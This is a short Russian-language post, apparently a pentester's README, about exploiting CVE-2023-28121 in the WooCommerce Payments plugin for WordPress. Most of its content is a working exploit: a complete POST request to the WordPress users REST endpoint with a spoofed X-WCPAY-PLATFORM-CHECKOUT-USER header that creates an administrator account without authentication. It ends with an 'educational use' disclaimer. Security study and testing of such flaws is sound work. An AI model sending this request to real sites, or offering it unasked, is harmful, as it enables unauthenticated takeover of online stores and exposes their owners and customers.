
Практическая эксплуатация критической уязвимости в WordPress с использованием плагина WooCommerce Payments.
Практическая эксплуатация критической уязвимости в WordPress с использованием плагина WooCommerce Payments.
CVE-2023-28121 позволяет создавать администраторов без аутентификации через REST API.
📊 Затронутый плагин насчитывает сотни тысяч установок и широко используется в электронной коммерции.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
Система принимает управляемый заголовок:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
Таким образом можно отправить запрос на создание пользователя с повышенными привилегиями без действительной аутентификации.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ Результат: создание пользователя admin
/wp-admin👨💻 Автор
Luis Eduardo .M.B.S.R
Pentester / Web Security
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
Использование в образовательных целях в контролируемой среде. Я не несу ответственности за то, как третьи лица используют эти знания.